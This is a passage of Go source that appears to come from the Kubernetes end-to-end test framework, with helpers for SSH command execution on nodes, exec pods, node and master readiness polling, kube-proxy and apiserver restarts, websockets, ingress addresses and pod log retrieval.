type SSHResult struct {
User string
Host string
Cmd string
Stdout string
Stderr string
Code int
}
// NodeExec execs the given cmd on node via SSH. Note that the nodeName is an SSH-able name,
// e.g. the name returned by framework.GetMasterHost(). This is also not guaranteed to work across
// cloud providers since it involves ssh.
func NodeExec(nodeName, cmd string) (SSHResult, error) {
return SSH(cmd, net.JoinHostPort(nodeName, sshPort), TestContext.Provider)
}
// SSH synchronously SSHs to a node running on provider and runs cmd. If there
// is no error performing the SSH, the stdout, stderr, and exit code are
// returned.
func SSH(cmd, host, provider string) (SSHResult, error) {
result := SSHResult{Host: host, Cmd: cmd}
// Get a signer for the provider.
signer, err := GetSigner(provider)
if err != nil {
return result, fmt.Errorf("error getting signer for provider %s: '%v'", provider, err)
}
// RunSSHCommand will default to Getenv("USER") if user == "", but we're
// defaulting here as well for logging clarity.
result.User = os.Getenv("KUBE_SSH_USER")
if result.User == "" {
result.User = os.Getenv("USER")
}
stdout, stderr, code, err := sshutil.RunSSHCommand(cmd, result.User, host, signer)
result.Stdout = stdout
result.Stderr = stderr
result.Code = code
return result, err
}
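// LogSSHResult logs the command, stdout, stderr, and exit code from an SSH invocation.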
func LogSSHResult(result SSHResult) {
remote := fmt.Sprintf("%s@%s", result.User, result.Host)
Logf("ssh %s: command: %s", remote, result.Cmd)
Logf("ssh %s: stdout: %q", remote, result.Stdout)
Logf("ssh %s: stderr: %q", remote, result.Stderr)
Logf("ssh %s: exit code: %d", remote, result.Code)
}
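// IssueSSHCommandWithResult runs cmd over SSH on the node's first external IP
// and returns the result, erroring if the command fails or exits non-zero.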
func IssueSSHCommandWithResult(cmd, provider string, node *v1.Node) (*SSHResult, error) {
Logf("Getting external IP address for %s", node.Name)
host := ""
for _, a := range node.Status.Addresses {
if a.Type == v1.NodeExternalIP {
host = net.JoinHostPort(a.Address, sshPort)
break
}
}
if host == "" {
return nil, fmt.Errorf("couldn't find external IP address for node %s", node.Name)
}
Logf("SSH %q on %s(%s)", cmd, node.Name, host)
result, err := SSH(cmd, host, provider)
LogSSHResult(result)
if result.Code != 0 || err != nil {
return nil, fmt.Errorf("failed running %q: %v (exit code %d)",
cmd, err, result.Code)
}
return &result, nil
}
func IssueSSHCommand(cmd, provider string, node *v1.Node) error {
_, err := IssueSSHCommandWithResult(cmd, provider, node)
if err != nil {
return err
}
return nil
}
// NewHostExecPodSpec returns the pod spec of hostexec pod
func NewHostExecPodSpec(ns, name string) *v1.Pod {
immediate := int64(0)
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: name,
Namespace: ns,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: "hostexec",
Image: "gcr.io/google_containers/hostexec:1.2",
ImagePullPolicy: v1.PullIfNotPresent,
},
},
HostNetwork: true,
SecurityContext: &v1.PodSecurityContext{},
TerminationGracePeriodSeconds: &immediate,
},
}
return pod
}
// RunHostCmd runs the given cmd in the context of the given pod using `kubectl exec`
// inside of a shell.
func RunHostCmd(ns, name, cmd string) (string, error) {
return RunKubectl("exec", fmt.Sprintf("--namespace=%v", ns), name, "--", "/bin/sh", "-c", cmd)
}
// RunHostCmdOrDie calls RunHostCmd and dies on error.
func RunHostCmdOrDie(ns, name, cmd string) string {
stdout, err := RunHostCmd(ns, name, cmd)
Logf("stdout: %v", stdout)
ExpectNoError(err)
return stdout
}
// LaunchHostExecPod launches a hostexec pod in the given namespace and waits
// until it's Running
func LaunchHostExecPod(client clientset.Interface, ns, name string) *v1.Pod {
hostExecPod := NewHostExecPodSpec(ns, name)
pod, err := client.Core().Pods(ns).Create(hostExecPod)
ExpectNoError(err)
err = WaitForPodRunningInNamespace(client, pod)
ExpectNoError(err)
return pod
}
// newExecPodSpec returns the pod spec of exec pod
func newExecPodSpec(ns, generateName string) *v1.Pod {
immediate := int64(0)
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
GenerateName: generateName,
Namespace: ns,
},
Spec: v1.PodSpec{
TerminationGracePeriodSeconds: &immediate,
Containers: []v1.Container{
{
Name: "exec",
Image: "gcr.io/google_containers/busybox:1.24",
Command: []string{"sh", "-c", "while true; do sleep 5; done"},
},
},
},
}
return pod
}
// CreateExecPodOrFail creates a simple busybox pod in a sleep loop used as a
// vessel for kubectl exec commands.
// Returns the name of the created pod.
func CreateExecPodOrFail(client clientset.Interface, ns, generateName string, tweak func(*v1.Pod)) string {
Logf("Creating new exec pod")
execPod := newExecPodSpec(ns, generateName)
if tweak != nil {
tweak(execPod)
}
created, err := client.Core().Pods(ns).Create(execPod)
Expect(err).NotTo(HaveOccurred())
err = wait.PollImmediate(Poll, 5*time.Minute, func() (bool, error) {
retrievedPod, err := client.Core().Pods(execPod.Namespace).Get(created.Name, metav1.GetOptions{})
if err != nil {
return false, nil
}
return retrievedPod.Status.Phase == v1.PodRunning, nil
})
Expect(err).NotTo(HaveOccurred())
return created.Name
}
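// CreatePodOrFail creates a single pause-container pod with the given labels
// and container ports, failing the test on error.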
func CreatePodOrFail(c clientset.Interface, ns, name string, labels map[string]string, containerPorts []v1.ContainerPort) {
By(fmt.Sprintf("Creating pod %s in namespace %s", name, ns))
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: name,
Labels: labels,
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: "pause",
Image: GetPauseImageName(c),
Ports: containerPorts,
// Add a dummy environment variable to work around a docker issue.
// https://github.com/docker/docker/issues/14203
Env: []v1.EnvVar{{Name: "FOO", Value: " "}},
},
},
},
}
_, err := c.Core().Pods(ns).Create(pod)
Expect(err).NotTo(HaveOccurred())
}
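// DeletePodOrFail deletes the named pod in the namespace, failing the test on error.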
func DeletePodOrFail(c clientset.Interface, ns, name string) {
By(fmt.Sprintf("Deleting pod %s in namespace %s", name, ns))
err := c.Core().Pods(ns).Delete(name, nil)
Expect(err).NotTo(HaveOccurred())
}
// GetSigner returns an ssh.Signer for the provider ("gce", etc.) that can be
// used to SSH to their nodes.
func GetSigner(provider string) (ssh.Signer, error) {
// Get the directory in which SSH keys are located.
keydir := filepath.Join(os.Getenv("HOME"), ".ssh")
// Select the key itself to use. When implementing more providers here,
// please also add them to any SSH tests that are disabled because of signer
// support.
keyfile := ""
key := ""
switch provider {
case "gce", "gke", "kubemark":
keyfile = "google_compute_engine"
case "aws":
// If there is an environment variable override, use that.
awsKeyfile := os.Getenv("AWS_SSH_KEY")
if len(awsKeyfile) != 0 {
return sshutil.MakePrivateKeySignerFromFile(awsKeyfile)
}
// Otherwise revert to home dir
keyfile = "kube_aws_rsa"
case "vagrant":
keyfile = os.Getenv("VAGRANT_SSH_KEY")
if len(keyfile) != 0 {
return sshutil.MakePrivateKeySignerFromFile(keyfile)
}
return nil, fmt.Errorf("VAGRANT_SSH_KEY env variable should be provided")
case "local", "vsphere":
keyfile = os.Getenv("LOCAL_SSH_KEY") // maybe?
if len(keyfile) == 0 {
keyfile = "id_rsa"
}
default:
return nil, fmt.Errorf("GetSigner(...) not implemented for %s", provider)
}
if len(key) == 0 {
key = filepath.Join(keydir, keyfile)
}
return sshutil.MakePrivateKeySignerFromFile(key)
}
// CheckPodsRunningReady returns whether all pods whose names are listed in
// podNames in namespace ns are running and ready, using c and waiting at most
// timeout.
func CheckPodsRunningReady(c clientset.Interface, ns string, podNames []string, timeout time.Duration) bool {
return CheckPodsCondition(c, ns, podNames, timeout, testutils.PodRunningReady, "running and ready")
}
// CheckPodsRunningReadyOrSucceeded returns whether all pods whose names are
// listed in podNames in namespace ns are running and ready, or succeeded, using
// c and waiting at most timeout.
func CheckPodsRunningReadyOrSucceeded(c clientset.Interface, ns string, podNames []string, timeout time.Duration) bool {
return CheckPodsCondition(c, ns, podNames, timeout, testutils.PodRunningReadyOrSucceeded, "running and ready, or succeeded")
}
// CheckPodsCondition returns whether all pods whose names are listed in podNames
// in namespace ns are in the condition, using c and waiting at most timeout.
func CheckPodsCondition(c clientset.Interface, ns string, podNames []string, timeout time.Duration, condition podCondition, desc string) bool {
np := len(podNames)
Logf("Waiting up to %v for %d pods to be %s: %s", timeout, np, desc, podNames)
result := make(chan bool, len(podNames))
for _, podName := range podNames {
// Launch off pod readiness checkers.
go func(name string) {
err := WaitForPodCondition(c, ns, name, desc, timeout, condition)
result <- err == nil
}(podName)
}
// Wait for them all to finish.
success := true
// TODO(a-robinson): Change to `for range` syntax and remove logging once we
// support only Go >= 1.4.
for _, podName := range podNames {
if !<-result {
Logf("Pod %[1]s failed to be %[2]s.", podName, desc)
success = false
}
}
Logf("Wanted all %d pods to be %s. Result: %t. Pods: %v", np, desc, success, podNames)
return success
}
// WaitForNodeToBeReady returns whether node name is ready within timeout.
func WaitForNodeToBeReady(c clientset.Interface, name string, timeout time.Duration) bool {
return WaitForNodeToBe(c, name, v1.NodeReady, true, timeout)
}
// WaitForNodeToBeNotReady returns whether node name is not ready (i.e. the
// readiness condition is anything but ready, e.g. false or unknown) within
// timeout.
func WaitForNodeToBeNotReady(c clientset.Interface, name string, timeout time.Duration) bool {
return WaitForNodeToBe(c, name, v1.NodeReady, false, timeout)
}
func isNodeConditionSetAsExpected(node *v1.Node, conditionType v1.NodeConditionType, wantTrue, silent bool) bool {
// Check the node readiness condition (logging all).
for _, cond := range node.Status.Conditions {
// Ensure that the condition type and the status matches as desired.
if cond.Type == conditionType {
// For the NodeReady condition we also need to check that the node
// controller's taints are gone.
if cond.Type == v1.NodeReady {
hasNodeControllerTaints := false
taints := node.Spec.Taints
for _, taint := range taints {
if taint.MatchTaint(nodectlr.UnreachableTaintTemplate) || taint.MatchTaint(nodectlr.NotReadyTaintTemplate) {
hasNodeControllerTaints = true
break
}
}
if wantTrue {
if (cond.Status == v1.ConditionTrue) && !hasNodeControllerTaints {
return true
} else {
msg := ""
if !hasNodeControllerTaints {
msg = fmt.Sprintf("Condition %s of node %s is %v instead of %t. Reason: %v, message: %v",
conditionType, node.Name, cond.Status == v1.ConditionTrue, wantTrue, cond.Reason, cond.Message)
} else {
msg = fmt.Sprintf("Condition %s of node %s is %v, but Node is tainted by NodeController with %v. Failure",
conditionType, node.Name, cond.Status == v1.ConditionTrue, taints)
}
if !silent {
Logf(msg)
}
return false
}
} else {
// TODO: check if the Node is tainted once we enable NC notReady/unreachable taints by default
if cond.Status != v1.ConditionTrue {
return true
}
if !silent {
Logf("Condition %s of node %s is %v instead of %t. Reason: %v, message: %v",
conditionType, node.Name, cond.Status == v1.ConditionTrue, wantTrue, cond.Reason, cond.Message)
}
return false
}
}
if (wantTrue && (cond.Status == v1.ConditionTrue)) || (!wantTrue && (cond.Status != v1.ConditionTrue)) {
return true
} else {
if !silent {
Logf("Condition %s of node %s is %v instead of %t. Reason: %v, message: %v",
conditionType, node.Name, cond.Status == v1.ConditionTrue, wantTrue, cond.Reason, cond.Message)
}
return false
}
}
}
if !silent {
Logf("Couldn't find condition %v on node %v", conditionType, node.Name)
}
return false
}
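// IsNodeConditionSetAsExpected reports whether the node condition of the
// given type matches wantTrue, logging any mismatch.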
func IsNodeConditionSetAsExpected(node *v1.Node, conditionType v1.NodeConditionType, wantTrue bool) bool {
return isNodeConditionSetAsExpected(node, conditionType, wantTrue, false)
}
func IsNodeConditionSetAsExpectedSilent(node *v1.Node, conditionType v1.NodeConditionType, wantTrue bool) bool {
return isNodeConditionSetAsExpected(node, conditionType, wantTrue, true)
}
func IsNodeConditionUnset(node *v1.Node, conditionType v1.NodeConditionType) bool {
for _, cond := range node.Status.Conditions {
if cond.Type == conditionType {
return false
}
}
return true
}
// WaitForNodeToBe returns whether the named node's condition state matches wantTrue
// within timeout. If wantTrue is true, it will ensure the node condition status
// is ConditionTrue; if it's false, it ensures the node condition is in any state
// other than ConditionTrue (e.g. not true or unknown).
func WaitForNodeToBe(c clientset.Interface, name string, conditionType v1.NodeConditionType, wantTrue bool, timeout time.Duration) bool {
Logf("Waiting up to %v for node %s condition %s to be %t", timeout, name, conditionType, wantTrue)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
node, err := c.Core().Nodes().Get(name, metav1.GetOptions{})
if err != nil {
Logf("Couldn't get node %s", name)
continue
}
if IsNodeConditionSetAsExpected(node, conditionType, wantTrue) {
return true
}
}
Logf("Node %s didn't reach desired %s condition status (%t) within %v", name, conditionType, wantTrue, timeout)
return false
}
// Checks whether not-ready nodes can be ignored while checking if all nodes are
// ready (we allow e.g. for incorrect provisioning of some small percentage of nodes
// while validating cluster, and those nodes may never become healthy).
// Currently we allow only for:
// - missing CNI plugins on the node
// TODO: we should extend it for other reasons.
func allowedNotReadyReasons(nodes []*v1.Node) bool {
for _, node := range nodes {
index, condition := nodeutil.GetNodeCondition(&node.Status, v1.NodeReady)
if index == -1 ||
!strings.Contains(condition.Message, "could not locate kubenet required CNI plugins") {
return false
}
}
return true
}
// Checks whether all registered nodes are ready.
// TODO: we should change the AllNodesReady call in AfterEach to WaitForAllNodesHealthy,
// and figure out how to do it in a configurable way, as we can't expect all setups to run
// default test add-ons.
func AllNodesReady(c clientset.Interface, timeout time.Duration) error {
Logf("Waiting up to %v for all (but %d) nodes to be ready", timeout, TestContext.AllowedNotReadyNodes)
var notReady []*v1.Node
err := wait.PollImmediate(Poll, timeout, func() (bool, error) {
notReady = nil
// It should be OK to list unschedulable Nodes here.
nodes, err := c.Core().Nodes().List(metav1.ListOptions{})
if err != nil {
return false, err
}
for i := range nodes.Items {
node := &nodes.Items[i]
if !IsNodeConditionSetAsExpected(node, v1.NodeReady, true) {
notReady = append(notReady, node)
}
}
// Framework allows for <TestContext.AllowedNotReadyNodes> nodes to be non-ready,
// to make it possible e.g. for incorrect deployment of some small percentage
// of nodes (which we allow in cluster validation). Some nodes that are not
// provisioned correctly at startup will never become ready (e.g. when something
// won't install correctly), so we can't expect them to be ready at any point.
//
// However, we only allow non-ready nodes with some specific reasons.
if len(notReady) > TestContext.AllowedNotReadyNodes {
return false, nil
}
return allowedNotReadyReasons(notReady), nil
})
if err != nil && err != wait.ErrWaitTimeout {
return err
}
if len(notReady) > TestContext.AllowedNotReadyNodes || !allowedNotReadyReasons(notReady) {
		names := make([]string, 0, len(notReady))
		for _, node := range notReady {
			names = append(names, node.Name)
		}
		return fmt.Errorf("Not ready nodes: %s", strings.Join(names, ", "))
}
return nil
}
// WaitForAllNodesHealthy checks whether all registered nodes are ready and all required Pods are running on them.
func WaitForAllNodesHealthy(c clientset.Interface, timeout time.Duration) error {
Logf("Waiting up to %v for all nodes to be ready", timeout)
var notReady []v1.Node
var missingPodsPerNode map[string][]string
err := wait.PollImmediate(Poll, timeout, func() (bool, error) {
notReady = nil
// It should be OK to list unschedulable Nodes here.
nodes, err := c.Core().Nodes().List(metav1.ListOptions{ResourceVersion: "0"})
if err != nil {
return false, err
}
for _, node := range nodes.Items {
if !IsNodeConditionSetAsExpected(&node, v1.NodeReady, true) {
notReady = append(notReady, node)
}
}
pods, err := c.Core().Pods(metav1.NamespaceAll).List(metav1.ListOptions{ResourceVersion: "0"})
if err != nil {
return false, err
}
systemPodsPerNode := make(map[string][]string)
for _, pod := range pods.Items {
if pod.Namespace == metav1.NamespaceSystem && pod.Status.Phase == v1.PodRunning {
if pod.Spec.NodeName != "" {
systemPodsPerNode[pod.Spec.NodeName] = append(systemPodsPerNode[pod.Spec.NodeName], pod.Name)
}
}
}
missingPodsPerNode = make(map[string][]string)
for _, node := range nodes.Items {
if !system.IsMasterNode(node.Name) {
for _, requiredPod := range requiredPerNodePods {
foundRequired := false
for _, presentPod := range systemPodsPerNode[node.Name] {
if requiredPod.MatchString(presentPod) {
foundRequired = true
break
}
}
if !foundRequired {
missingPodsPerNode[node.Name] = append(missingPodsPerNode[node.Name], requiredPod.String())
}
}
}
}
return len(notReady) == 0 && len(missingPodsPerNode) == 0, nil
})
if err != nil && err != wait.ErrWaitTimeout {
return err
}
if len(notReady) > 0 {
return fmt.Errorf("Not ready nodes: %v", notReady)
}
if len(missingPodsPerNode) > 0 {
return fmt.Errorf("Not running system Pods: %v", missingPodsPerNode)
}
return nil
}
// FilterNodes filters nodes in a NodeList in place, removing nodes that do not
// satisfy the given condition.
// TODO: consider merging with pkg/client/cache.NodeLister
func FilterNodes(nodeList *v1.NodeList, fn func(node v1.Node) bool) {
var l []v1.Node
for _, node := range nodeList.Items {
if fn(node) {
l = append(l, node)
}
}
nodeList.Items = l
}
// ParseKVLines parses output that looks like lines containing "<key>: <val>"
// and returns <val> if <key> is found. Otherwise, it returns the empty string.
func ParseKVLines(output, key string) string {
delim := ":"
key = key + delim
for _, line := range strings.Split(output, "\n") {
pieces := strings.SplitAfterN(line, delim, 2)
if len(pieces) != 2 {
continue
}
k, v := pieces[0], pieces[1]
if k == key {
return strings.TrimSpace(v)
}
}
return ""
}
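// Illustrative usage (the sample output below is made up, not from the
// original file): ParseKVLines is handy for scraping "key: value" style
// command output.
//
//	out := "Major: 1\nMinor: 6\n"
//	major := ParseKVLines(out, "Major") // "1"
//	patch := ParseKVLines(out, "Patch") // "" (key not present)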
func RestartKubeProxy(host string) error {
// TODO: Make it work for all providers.
if !ProviderIs("gce", "gke", "aws") {
return fmt.Errorf("unsupported provider: %s", TestContext.Provider)
}
// kubelet will restart the kube-proxy since it's running in a static pod
Logf("Killing kube-proxy on node %v", host)
result, err := SSH("sudo pkill kube-proxy", host, TestContext.Provider)
if err != nil || result.Code != 0 {
LogSSHResult(result)
return fmt.Errorf("couldn't restart kube-proxy: %v", err)
}
// wait for kube-proxy to come back up
sshCmd := "sudo /bin/sh -c 'pgrep kube-proxy | wc -l'"
err = wait.Poll(5*time.Second, 60*time.Second, func() (bool, error) {
Logf("Waiting for kubeproxy to come back up with %v on %v", sshCmd, host)
result, err := SSH(sshCmd, host, TestContext.Provider)
if err != nil {
return false, err
}
if result.Code != 0 {
LogSSHResult(result)
return false, fmt.Errorf("failed to run command, exited %d", result.Code)
}
if result.Stdout == "0\n" {
return false, nil
}
Logf("kube-proxy is back up.")
return true, nil
})
if err != nil {
return fmt.Errorf("kube-proxy didn't recover: %v", err)
}
return nil
}
func RestartApiserver(c discovery.ServerVersionInterface) error {
// TODO: Make it work for all providers.
if !ProviderIs("gce", "gke", "aws") {
return fmt.Errorf("unsupported provider: %s", TestContext.Provider)
}
if ProviderIs("gce", "aws") {
return sshRestartMaster()
}
// GKE doesn't allow ssh access, so use a same-version master
// upgrade to teardown/recreate master.
v, err := c.ServerVersion()
if err != nil {
return err
}
return masterUpgradeGKE(v.GitVersion[1:]) // strip leading 'v'
}
func sshRestartMaster() error {
if !ProviderIs("gce", "aws") {
return fmt.Errorf("unsupported provider: %s", TestContext.Provider)
}
var command string
if ProviderIs("gce") {
// `kube-apiserver_kube-apiserver` matches the name of the apiserver
// container.
command = "sudo docker ps | grep kube-apiserver_kube-apiserver | cut -d ' ' -f 1 | xargs sudo docker kill"
} else {
command = "sudo /etc/init.d/kube-apiserver restart"
}
Logf("Restarting master via ssh, running: %v", command)
result, err := SSH(command, net.JoinHostPort(GetMasterHost(), sshPort), TestContext.Provider)
if err != nil || result.Code != 0 {
LogSSHResult(result)
return fmt.Errorf("couldn't restart apiserver: %v", err)
}
return nil
}
func WaitForApiserverUp(c clientset.Interface) error {
for start := time.Now(); time.Since(start) < time.Minute; time.Sleep(5 * time.Second) {
body, err := c.Core().RESTClient().Get().AbsPath("/healthz").Do().Raw()
if err == nil && string(body) == "ok" {
return nil
}
}
return fmt.Errorf("waiting for apiserver timed out")
}
// WaitForClusterSize waits until the cluster reaches the desired size and
// contains no not-ready nodes. By cluster size we mean the number of Nodes excluding the Master Node.
func WaitForClusterSize(c clientset.Interface, size int, timeout time.Duration) error {
for start := time.Now(); time.Since(start) < timeout; time.Sleep(20 * time.Second) {
nodes, err := c.Core().Nodes().List(metav1.ListOptions{FieldSelector: fields.Set{
"spec.unschedulable": "false",
}.AsSelector().String()})
if err != nil {
Logf("Failed to list nodes: %v", err)
continue
}
numNodes := len(nodes.Items)
// Filter out not-ready nodes.
FilterNodes(nodes, func(node v1.Node) bool {
return IsNodeConditionSetAsExpected(&node, v1.NodeReady, true)
})
numReady := len(nodes.Items)
if numNodes == size && numReady == size {
Logf("Cluster has reached the desired size %d", size)
return nil
}
Logf("Waiting for cluster size %d, current size %d, not ready nodes %d", size, numNodes, numNodes-numReady)
}
return fmt.Errorf("timeout waiting %v for cluster size to be %d", timeout, size)
}
func GenerateMasterRegexp(prefix string) string {
return prefix + "(-...)?"
}
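// For example (illustrative prefix), GenerateMasterRegexp("kubernetes-master")
// yields "kubernetes-master(-...)?", which matches both a single master
// ("kubernetes-master") and replicas with a three-character suffix
// (e.g. "kubernetes-master-ab1").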
// WaitForMasters waits until the cluster has the desired number of ready masters in it.
func WaitForMasters(masterPrefix string, c clientset.Interface, size int, timeout time.Duration) error {
for start := time.Now(); time.Since(start) < timeout; time.Sleep(20 * time.Second) {
nodes, err := c.Core().Nodes().List(metav1.ListOptions{})
if err != nil {
Logf("Failed to list nodes: %v", err)
continue
}
// Filter out nodes that are not master replicas
FilterNodes(nodes, func(node v1.Node) bool {
res, err := regexp.Match(GenerateMasterRegexp(masterPrefix), ([]byte)(node.Name))
if err != nil {
Logf("Failed to match regexp to node name: %v", err)
return false
}
return res
})
numNodes := len(nodes.Items)
// Filter out not-ready nodes.
FilterNodes(nodes, func(node v1.Node) bool {
return IsNodeConditionSetAsExpected(&node, v1.NodeReady, true)
})
numReady := len(nodes.Items)
if numNodes == size && numReady == size {
Logf("Cluster has reached the desired number of masters %d", size)
return nil
}
Logf("Waiting for the number of masters %d, current %d, not ready master nodes %d", size, numNodes, numNodes-numReady)
}
return fmt.Errorf("timeout waiting %v for the number of masters to be %d", timeout, size)
}
// GetHostExternalAddress gets the node for a pod and returns the first External
// address. Returns an error if the node the pod is on doesn't have an External
// address.
func GetHostExternalAddress(client clientset.Interface, p *v1.Pod) (externalAddress string, err error) {
node, err := client.Core().Nodes().Get(p.Spec.NodeName, metav1.GetOptions{})
if err != nil {
return "", err
}
for _, address := range node.Status.Addresses {
if address.Type == v1.NodeExternalIP {
if address.Address != "" {
externalAddress = address.Address
break
}
}
}
if externalAddress == "" {
err = fmt.Errorf("No external address for pod %v on node %v",
p.Name, p.Spec.NodeName)
}
return
}
type extractRT struct {
http.Header
}
func (rt *extractRT) RoundTrip(req *http.Request) (*http.Response, error) {
rt.Header = req.Header
return &http.Response{}, nil
}
// headersForConfig extracts the HTTP headers that the client wrappers for the
// provided config would add to a request.
func headersForConfig(c *restclient.Config) (http.Header, error) {
extract := &extractRT{}
rt, err := restclient.HTTPWrappersForConfig(c, extract)
if err != nil {
return nil, err
}
if _, err := rt.RoundTrip(&http.Request{}); err != nil {
return nil, err
}
return extract.Header, nil
}
// OpenWebSocketForURL constructs a websocket connection to the provided URL, using the client
// config, with the specified protocols.
func OpenWebSocketForURL(url *url.URL, config *restclient.Config, protocols []string) (*websocket.Conn, error) {
tlsConfig, err := restclient.TLSConfigFor(config)
if err != nil {
return nil, fmt.Errorf("failed to create tls config: %v", err)
}
if tlsConfig != nil {
url.Scheme = "wss"
if !strings.Contains(url.Host, ":") {
url.Host += ":443"
}
} else {
url.Scheme = "ws"
if !strings.Contains(url.Host, ":") {
url.Host += ":80"
}
}
headers, err := headersForConfig(config)
if err != nil {
return nil, fmt.Errorf("failed to load http headers: %v", err)
}
cfg, err := websocket.NewConfig(url.String(), "http://localhost")
if err != nil {
return nil, fmt.Errorf("failed to create websocket config: %v", err)
}
cfg.Header = headers
cfg.TlsConfig = tlsConfig
cfg.Protocol = protocols
return websocket.DialConfig(cfg)
}
// getIngressAddress returns the ips/hostnames associated with the Ingress.
func getIngressAddress(client clientset.Interface, ns, name string) ([]string, error) {
ing, err := client.Extensions().Ingresses(ns).Get(name, metav1.GetOptions{})
if err != nil {
return nil, err
}
addresses := []string{}
for _, a := range ing.Status.LoadBalancer.Ingress {
if a.IP != "" {
addresses = append(addresses, a.IP)
}
if a.Hostname != "" {
addresses = append(addresses, a.Hostname)
}
}
return addresses, nil
}
// WaitForIngressAddress waits for the Ingress to acquire an address.
func WaitForIngressAddress(c clientset.Interface, ns, ingName string, timeout time.Duration) (string, error) {
var address string
err := wait.PollImmediate(10*time.Second, timeout, func() (bool, error) {
ipOrNameList, err := getIngressAddress(c, ns, ingName)
if err != nil || len(ipOrNameList) == 0 {
Logf("Waiting for Ingress %v to acquire IP, error %v", ingName, err)
return false, nil
}
address = ipOrNameList[0]
return true, nil
})
return address, err
}
// LookForStringInLog looks for the given string in the log of a specific pod container.
func LookForStringInLog(ns, podName, container, expectedString string, timeout time.Duration) (result string, err error) {
return LookForString(expectedString, timeout, func() string {
return RunKubectlOrDie("logs", podName, container, fmt.Sprintf("--namespace=%v", ns))
})
}
// LookForStringInFile looks for the given string in a file in a specific pod container.
func LookForStringInFile(ns, podName, container, file, expectedString string, timeout time.Duration) (result string, err error) {
return LookForString(expectedString, timeout, func() string {
return RunKubectlOrDie("exec", podName, "-c", container, fmt.Sprintf("--namespace=%v", ns), "--", "cat", file)
})
}
// LookForStringInPodExec looks for the given string in the output of a command executed in a specific pod container.
func LookForStringInPodExec(ns, podName string, command []string, expectedString string, timeout time.Duration) (result string, err error) {
return LookForString(expectedString, timeout, func() string {
// use the first container
args := []string{"exec", podName, fmt.Sprintf("--namespace=%v", ns), "--"}
args = append(args, command...)
return RunKubectlOrDie(args...)
})
}
// LookForString looks for the given string in the output of fn, repeatedly
// calling fn until the timeout is reached or the string is found. It returns
// the last output and an error if the string was not found.
func LookForString(expectedString string, timeout time.Duration, fn func() string) (result string, err error) {
for t := time.Now(); time.Since(t) < timeout; time.Sleep(Poll) {
result = fn()
if strings.Contains(result, expectedString) {
return
}
}
err = fmt.Errorf("Failed to find \"%s\", last result: \"%s\"", expectedString, result)
return
}
// getSvcNodePort returns the node port for the given service:port.
func getSvcNodePort(client clientset.Interface, ns, name string, svcPort int) (int, error) {
svc, err := client.Core().Services(ns).Get(name, metav1.GetOptions{})
if err != nil {
return 0, err
}
for _, p := range svc.Spec.Ports {
if p.Port == int32(svcPort) {
if p.NodePort != 0 {
return int(p.NodePort), nil
}
}
}
return 0, fmt.Errorf(
"No node port found for service %v, port %v", name, svcPort)
}
// GetNodePortURL returns the url to a nodeport Service.
func GetNodePortURL(client clientset.Interface, ns, name string, svcPort int) (string, error) {
nodePort, err := getSvcNodePort(client, ns, name, svcPort)
if err != nil {
return "", err
}
// This list of nodes must not include the master, which is marked
// unschedulable, since the master doesn't run kube-proxy. Without
// kube-proxy NodePorts won't work.
var nodes *v1.NodeList
if wait.PollImmediate(Poll, SingleCallTimeout, func() (bool, error) {
nodes, err = client.Core().Nodes().List(metav1.ListOptions{FieldSelector: fields.Set{
"spec.unschedulable": "false",
}.AsSelector().String()})
return err == nil, nil
}) != nil {
return "", err
}
if len(nodes.Items) == 0 {
return "", fmt.Errorf("Unable to list nodes in cluster.")
}
for _, node := range nodes.Items {
for _, address := range node.Status.Addresses {
if address.Type == v1.NodeExternalIP {
if address.Address != "" {
return fmt.Sprintf("http://%v:%v", address.Address, nodePort), nil
}
}
}
}
return "", fmt.Errorf("Failed to find external address for service %v", name)
}
// ScaleRCByLabels scales RCs found via ns/label lookup. If replicas == 0 it waits until
// none are running; otherwise it does what a synchronous scale operation would do.
func ScaleRCByLabels(clientset clientset.Interface, internalClientset internalclientset.Interface, ns string, l map[string]string, replicas uint) error {
listOpts := metav1.ListOptions{LabelSelector: labels.SelectorFromSet(labels.Set(l)).String()}
rcs, err := clientset.Core().ReplicationControllers(ns).List(listOpts)
if err != nil {
return err
}
if len(rcs.Items) == 0 {
return fmt.Errorf("RC with labels %v not found in ns %v", l, ns)
}
Logf("Scaling %v RCs with labels %v in ns %v to %v replicas.", len(rcs.Items), l, ns, replicas)
for _, labelRC := range rcs.Items {
name := labelRC.Name
if err := ScaleRC(clientset, internalClientset, ns, name, replicas, false); err != nil {
return err
}
rc, err := clientset.Core().ReplicationControllers(ns).Get(name, metav1.GetOptions{})
if err != nil {
return err
}
if replicas == 0 {
ps, err := podStoreForSelector(clientset, rc.Namespace, labels.SelectorFromSet(rc.Spec.Selector))
if err != nil {
return err
}
defer ps.Stop()
if err = waitForPodsGone(ps, 10*time.Second, 10*time.Minute); err != nil {
return fmt.Errorf("error while waiting for pods gone %s: %v", name, err)
}
} else {
if err := testutils.WaitForPodsWithLabelRunning(
clientset, ns, labels.SelectorFromSet(labels.Set(rc.Spec.Selector))); err != nil {
return err
}
}
}
return nil
}
// TODO(random-liu): Change this to be a member function of the framework.
func GetPodLogs(c clientset.Interface, namespace, podName, containerName string) (string, error) {
return getPodLogsInternal(c, namespace, podName, containerName, false)
}
func getPreviousPodLogs(c clientset.Interface, namespace, podName, containerName string) (string, error) {
return getPodLogsInternal(c, namespace, podName, containerName, true)
}
// getPodLogsInternal is a utility function for gomega Eventually; it fetches the
// current or previous (terminated) container logs depending on the previous flag.
func getPodLogsInternal(c clientset.Interface, namespace, podName, containerName string, previous bool) (string, error) {
logs, err := c.Core().RESTClient().Get().
Resource("pods").
Namespace(namespace).
Name(podName).SubResource("log").
Param("container", containerName).
Param("previous", strconv.FormatBool(previous)).
Do().
Raw()
	if err != nil {
		return "", err
	}
	if strings.Contains(string(logs), "Internal Error") {
		return "", fmt.Errorf("Fetched log contains \"Internal Error\": %q.", string(logs))
	}
	return string(logs), nil
}
func GetGCECloud() (*gcecloud.GCECloud, error) {
gceCloud, ok := TestContext.CloudConfig.Provider.(*gcecloud.GCECloud)
if !ok {
return nil, fmt.Errorf("failed to convert CloudConfig.Provider to GCECloud: %#v", TestContext.CloudConfig.Provider)
}
return gceCloud, nil
}
// EnsureLoadBalancerResourcesDeleted ensures that cloud load balancer resources that were created
// are actually cleaned up. Currently only implemented for GCE/GKE.
